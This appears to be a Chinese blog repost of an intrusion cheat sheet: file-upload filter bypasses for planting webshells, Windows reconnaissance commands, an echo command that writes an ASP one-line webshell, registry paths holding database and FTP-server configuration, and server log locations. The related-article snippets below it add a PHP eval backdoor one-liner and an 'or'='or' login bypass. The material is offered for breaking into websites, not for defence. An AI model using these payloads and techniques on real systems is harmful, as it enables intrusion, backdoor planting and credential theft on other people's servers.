入侵渗透中用到的一些技巧和思路

最新推荐文章于 2023-03-16 17:30:00 发布
最新推荐文章于 2023-03-16 17:30:00 发布
阅读量170 收藏
点赞数
原文链接:http://www.cnblogs.com/swane/archive/2011/04/02/2003186.html
版权

上传漏洞拿shell:

    1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx....之类的马,拿到shell.
    2.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现。例:*.asp ,*.asp..。
    3.利用双重扩展名上传例如:*.jpg.asa格式(也可以配上第二点一起利用)。
    4.gif文件头欺骗
    5.同名重复上传也很OK。:

入侵渗透中用到的命令,语法:

    set,systeminfo,ipconfig,ping,利用这些命令可以收到比较多的系统信息
    tasklist /svc   查看 服务对应的pid
    netstat -ano,netstat -abnv
    fsutil.exe fsinfo drives  列出全部盘符
    dir d:\*conn*.* /s     找数据库连接文件
    telnet 218.25.88.234 3389    对外部是否开放了这个端口
    echo  ^<%execute(request("cmd"))%^> >>e:\k\X.asp   写一句话到e:\k\目录,密码为cmd.
    type d:\wwwroot\web\k6.asp >d:\wwwroot\123\a.asp   传送d:\wwwroot\web\下的k6.asp到d:\wwwroot\123\重命名为a.asp

注册表敏感信息:

    HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\    mysql 注册表位置
    HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\   华众主机位置
    HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\    serv-u 位置
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNamber 3389端口
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters    1433端口
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSFtpsvc\Parameters\Virtual Roots\  服务器ftp路径

服务器日志文件物理路径:

    安全日志文件:%systemroot%\system32\config \SecEvent.EVT
    系统日志文件:%systemroot%\system32\config \SysEvent.EVT
    应用程序日志文件:%systemroot%\system32\config \AppEvent.EVT
    FTP连接日志和HTTPD事务日志:systemroot% \system32\LogFiles\,下面还有子文件夹,分别对应该FTP和Web服务的日志,其对应的后缀名为.Log。
    诺顿杀毒日志:C:\Documents and Settings\All Users\Application Data\Symantec

转载于:https://www.cnblogs.com/swane/archive/2011/04/02/2003186.html

weixin_30274627
关注
白帽子Android渗透测试指南
程序员光剑
08-06 719
随着智能手机的普及和移动互联网的快速发展,Android系统作为全球市场占有率最高的移动操作系统,其安全性越来越受到人们的重视。与此同时,针对Android系统的恶意软件和攻击手段也层出不穷,给用户的信息安全和隐私保护带来了极大的威胁。为了帮助广大开发者和安全爱好者更好地了解Android系统的安全机制,掌握Android渗透测试的基本方法和技巧,本文将从白帽子的角度出发,详细介绍Android渗透测试的流程、技术和工具,并结合实际案例进行分析和讲解。
45种可拿SHELL的方法
03-07
45种可拿SHELL的方法
dedecms网站入侵拿webshell方法总结
12-05 1253
dedecms网站入侵拿webshell方法 dedecms现已广泛流传,对其安全问题不易忽视!了解入侵方法做好网站安全措施。... dedecms网站入侵拿webshell方法 文章作者:udb311 转载请注明:http://www.hackline.net/ 1、注入漏洞 存在注入地址:在域名下输入plus/digg_frame.php?action=good&amp;id=1...
一些入侵思路
fireman
06-22 885
在百度上搜索ckl inurl:asp,搜索出来的,只要是MSSQL数据库的就一定是db_owner权限以上,起码我还没看到过 public的,db_owner可是对当前连接的数据库拥有一切操作权利,可以执行select,update,delete.create.drop等命令. 在搜索出来的资料,找到一个china级的网站,是db_owner权限,浏览一下网站,发现上面上了一个动网7.1论坛,通
入侵渗透思路
HackCode的专栏
07-23 1406
 信息来源:军团一,踩点 踩点可以了解目标主机和网络的一些基本的安全信息,主要有; 1,管理员联系信息,电话号,传真号; 2,IP地址范围; 3,DNS服务器; 4,邮件服务器。 相关搜索方法: 1,搜索网页。 确定目标信息1,为以后发动字典和木马入侵做准备;寻找网页源代码找注释和 隐藏域,寻找隐藏域的"FORM"标记。例如: FORM action=/Poll/poll.asp method=
渗透入侵\Domain4.3.zip
07-15
Domain4.3
网站渗透思路总结
最新发布
bluemoon_0的博客
03-16 1481
网站渗透思路总结
网络安全kali渗透学习 web渗透入门 NAMP高级使用技巧和如何进行漏洞挖掘
xueshenlaila的博客
02-18 1460
nmap是一个网络探测和安全扫描程序,系统管理者和个人可以使用这个软件扫描大型的网络,获取那台主机正在运行以及提供什么服务等信息。 nmap支持很多扫描技术,例如:UDP、TCP connect()、TCP SYN(半开扫描)、ftp代理(bounce攻击)、反向标志、ICMP、FIN、ACK扫描、圣诞树(Xmas Tree)、SYN扫描和null扫描。还可以探测操作系统类型。 这篇文章教大家使用NMAP的技巧和如何进行漏洞扫描 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公
NMAP的入侵检测系统绕过技巧
# 1. 简介 ## 1.1 什么是NMAP的入侵检测系统 ...入侵检测系统可以实时监测网络流量,识别网络活动的异常行为并采取相应的防御措施,从而提高网络的安全性和稳定性。 入侵检测系统可以帮助网络管
入侵渗透的经验
centos的博客
10-18 6185
2012-11-20 09:12 (分类:网络安全) 先看站点 拿shell的方法太多了  主要是提权和入侵思路  踩点  PING命令ping系统      TTL=32     9X/ME                              TTL=64     LINUX                              TTL=128    20
黑客常用 Linux 入侵常用命令
热门推荐
杨春建的博客
02-10 1万+
原文地址:http://blog.csdn.net/jHstGeWWubw/article/details/78941387写个php一句话后门上去:[jobcruit@wa64-054 rankup_log]$ echo -e "&lt;?php @eval(\$_POST[md5])?&gt;" &gt;rankuplog_time.php[jobcruit@wa64-054 rankup_l...
网站后台拿shell方法总结
一小平民
03-18 1万+
今日带给大伙的都是些手艺上的总结,有些人老问经验怎么来的,这个即是经验,盼愿大伙都能成为脚本妙手. 动网上传漏洞,信任大伙拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然全国,现在这种漏洞已经根柢斗劲难见到了,不扫除一些小网站模拟仍是存在此漏洞。在拿站历程,我们凡是费了九牛两虎之力拿到办理员帐号和密码,并顺遂进入了后台,当然此时与拿到网站webshell还有一步之遥
webshell提权拿服务器方法总结
xysoul的专栏
03-20 1万+
今天有朋友希望更新一些关于提权的一些文章,加上小残今天有时间所以在这里为大家讲解下本人的一般拿到webshell的提权思路把。 1.我相信很多朋友刚拿到webshell以后都会尝试是否能执行CMD命令,如果可以执行CMD的话我相信能给提权拿服务器省去很多时间。 如果不能执行CMD命令的话大家继续往下看。 2.不能执行CMD的话我们可以看下组件支持,脚本
怎样拿shell技巧
elsery
02-19 1万+
怎样拿shell技巧结合本人和网络上的一些资料,仅供参考!经典的用户名密码 ‘or’=’or’ ‘or’1’=’1这2个密码在很多网站后台,QQ空间相册都可以登陆,不过不是100%而已….inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用. intext: 只搜索网页部分包含的文字(也就是忽略了标题,URL等的文字). site: 可以限制你搜索范
利用文件上传拿shell和绕过的一些思路总结
qq_40529133的博客
04-10 2088
一,利用文件解析漏洞 二,上传本地验证绕过 三,上传服务器端验证绕过 1 ,文件解析漏洞 解析漏洞主要说的是一些特殊文件被“IIS,Apache,Nginx”在某种情况下解释成脚本文件格式的漏洞。 像IIS,Apache,Nginx这些容器在特定版本下是存在解析漏洞的。像IIS5.X/6.0这些老版本都存在解析漏洞。 IIS6.0解析利用方法有两种 1,目录解析 /xx.asp/xx.jpg。在网...
webshell相关之——渗透获取webshell思路总结
温柔小薛的博客
04-30 4003
渗透获取webshell思路总结 又坐一天没动地方哈,但是感觉还是有一些没真整明白,也没总结的特别全面细致,今天先发出来,明天再花时间再整理一下,这个问题也是很多面试常见问题,我认为值得花些时间来研究。 今天就从CMS和非CMS,与有管理权限和无管理权限(无需登录),这几个方面来梳理一下渗透测试获取webshell思路,并没有很具体的方法实战,现在关于这个思路都是用一个南方内个靶机,网上很多...
国外黑客们的入侵网站思路
kuxing100的专栏
03-28 4796
问题的答案看起来不那么确定,显而易见的是黑掉一个站点有很多种方法。在这篇文章,我们的目标是要给大家展示一下黑客是如何锁定并黑掉一个目标站点的! 让我们来看看目标站点:hack-test.com 先ping下站点所在服务器的IP: 现在我们有了目标站点所在服务器的IP了 — 173.236.138.113 然后我们可以找找同个IP上的其他站点(旁站:samei
常见渗透的一种思路
Drigon
04-21 604
Windows入侵技巧:常用命令详解
"这篇文章主要介绍了在Windows环境下进行网络入侵或安全测试时常用的命令,包括ping和nbtstat。这些命令可以帮助管理员或网络安全专家检测网络连接、识别主机以及获取操作系统信息。" **一、ping命令** ping是网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值